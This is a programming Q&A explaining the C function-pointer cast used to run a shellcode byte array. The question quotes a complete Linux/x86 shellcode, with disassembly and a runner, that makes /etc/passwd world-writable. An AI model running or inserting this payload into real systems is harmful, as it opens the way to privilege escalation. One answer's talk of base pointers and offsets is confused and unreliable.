# what (*(void(*)()) shellcode)(); means?

Tags: c++, c

Sorry if this sounds trivial, but can anybody explain to me what this is?

```
(*(void(*)()) shellcode)();
```

I think the second `*` is setting `void` to be a pointer, but and the first `*`? a casting? and the `()` is for call some function?

The source code is here:

```
/*
# Title: Linux/x86 chmod('/etc/passwd',0777) - shellcode 42 bytes
# Platform: linux/x86_64
# Author: Mohammad Reza Espargham
#    Linkedin    :   https://ir.linkedin.com/in/rezasp
#    E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
#    Website     :   www.reza.es
#    Twitter     :   https://twitter.com/rezesp
#    FaceBook    :   https://www.facebook.com/mohammadreza.espargham


 Disassembly of section .text:


 00000000 <.text>:
 0:    6a 0f                    push   $0xf
 2:    58                       pop    %eax
 3:    68 90 90 ff 01           push   $0x1ff9090
 8:    59                       pop    %ecx
 9:    c1 e9 10                 shr    $0x10,%ecx
 c:    68 90 73 77 64           push   $0x64777390
 11:    5b                       pop    %ebx
 12:    c1 eb 08                 shr    $0x8,%ebx
 15:    53                       push   %ebx
 16:    68 2f 70 61 73           push   $0x7361702f
 1b:    68 2f 65 74 63           push   $0x6374652f
 20:    89 e3                    mov    %esp,%ebx
 22:    cd 80                    int    $0x80
 24:    b0 01                    mov    $0x1,%al
 26:    b3 01                    mov    $0x1,%bl
 28:    cd 80                    int    $0x80
 */

#include <stdio.h>
#include <string.h>

int main(){
    unsigned char shellcode[] = "\x6a\x0f\x58\x68\x90\x90\xff\x01\x59\xc1\xe9\x10\x68\x90\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
    fprintf(stdout, "Length: %d\n\n", strlen(shellcode));
    (*(void(*)()) shellcode)();
}
```

Answer (score 12, accepted):

It's casting `shellcode` to a function pointer returning nothing and taking an unspecified number of parameters. And then calling it.

The `void (*)()` is the type of a function that returns nothing and takes an unspecified number of parameters.

```
/* | --------------------| Cast to a function pointer
   |                     |                         */
(* ((void(*)()) shellcode)) () /*
 ^                           ^ call the function through the pointer
 |-- dereference the pointer */
```

Comment: Not an unspecified number of arguments, no arguments.

Comment: @Steve: In C, it's an unspecified number of arguments.  For no arguments, it would be `(*(void(*)(void)) shellcode)();`

Comment: @Steve I am very sure it's an unspecified number of arguments. If you want it with **NO** arguments then the signature should be `void(*)(void)`.

Comment: @Steve, it depends on whether you use C or C++.

Comment: @zneak Which is why sometimes tagging with [tag:c] and [tag:c++] is bad. And is what Steve said true if it was c++?

Comment: `void (*)()` is the type of a **pointer to a** function that returns nothing and takes an unspecified number of parameters.

Comment: @iharob yes, in C++ it means taking no arguments

Comment: Additionally, this causes undefined behaviour if the function being called is not declared to return `void` .

Comment: It **also** causes UB if the function is called with different arguments (either of a different type or a different number) than the actual definition of that function. And IIRC it's also UB if the actual definition is of a vararg function. But it's probably already UB because it's casting data to code. On modern OS'es this breaks due to DEP or W^X protection.

Answer (score 1):

shellcode is a signature to a function pointer. Its used to find a base pointer and add some offsets to find the function pointer.

Consider the following code, its the same:

```
#include <iostream>

void anotherFunction()
{
    std::cout << "Im being called" << std::endl;
}

int main()
{
    typedef void (*funcPtr)(void);
    funcPtr f=&anotherFunction;

    f();

    std::cin.get();
    return 0;
}
```

This is the same thing as well

```
(*(void(*)(void))&anotherFunction)();
```

except for the signature ofc.

Comment: IDK what you are trying to say about base pointers and offsets ?

Comment: I'm not sure i am following mate. Do you mean i should skip the whole part regarding it or are you asking what it is?